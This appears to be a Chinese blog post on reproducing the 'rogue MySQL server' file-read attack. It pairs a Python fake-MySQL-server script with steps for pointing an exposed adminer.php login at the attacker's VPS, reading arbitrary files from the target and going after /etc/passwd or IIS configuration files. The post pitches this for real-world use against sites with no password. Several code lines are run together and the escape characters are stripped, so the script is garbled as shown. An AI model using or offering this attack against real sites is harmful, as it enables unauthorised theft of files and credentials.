MySQL服务端读取客户端文件漏洞的复现

这个漏洞我没有找到具体的出处，所以我没有详述此漏洞的前因后果，但是因为有很强的实战性，有必要分享给大家。

简单一点讲，如果你扫描网站目录，恰巧碰上了adminer.php这个链接，恭喜你，不需要密码，基本你可以搞定此站了。

利用的工具MySQL.py，代码如下：

#coding=utf-8 
import socket
import loggingimport syslogging.basicConfig(level=logging.DEBUG)filename=sys.argv[1]
sv=socket.socket()sv.setsockopt(1,2,1)
sv.bind(("",3306))
sv.listen(5)
conn,address=sv.accept()logging.info('Conn from: %r', address)
conn.sendall("x4ax00x00x00x0ax35x2ex35x2ex35x33x00x17x00x00x00x6ex7ax3bx54x76x73x61x6ax00xffxf7x21x02x00x0fx80x15x00x00x00x00x00x00x00x00x00x00x70x76x21x3dx50x5cx5ax32x2ax7ax49x3fx00x6dx79x73x71x6cx5fx6ex61x74x69x76x65x5fx70x61x73x73x77x6fx72x64x00")
conn.recv(9999)
logging.info("auth okay")
conn.sendall("x07x00x00x02x00x00x00x02x00x00x00")
conn.recv(9999)
logging.info("want file...")
wantfile=chr(len(filename)+1)+"x00x00x01xFB"+filename
conn.sendall(wantfile)content=conn.recv(9999)
logging.info(content)conn.close()

实战测试：

第一步，在VPS上执行此代码。

我文章是用我的虚拟机和物理机演示的。在我的虚拟机kali上执行的：Python mysql.py "要读的目标站点的文件"

我KALI虚拟机的IP地址是192.168.1.5

保障你的VPS中的用这个mysql.py开的3306端口是可以被外部连上的。

第二步，打开目标站的adminer.php，输入vps的地址，用户名和密码乱写就可以。

我是用本机的物理机演示的。

第三步，点击登陆，在你的vps上就得到要读的止标站点文件的源码了。

在上图中，我读的是物理机中的d:/1.bat，因为1.bat里有中文，所以有乱码。

另外，有个小技巧，如果不知物理目录的话，你可以在第一步中执行python mysql.py “xxx"，有可能暴出物理目录。当然，你也可以读/etc/passwd，iis下的配置文件来得到目标站的物理目录。还有，如果复制本文中代码不方便的话，也可以利用https://github.com/allyshka/Rogue-MySql-Server此脚本。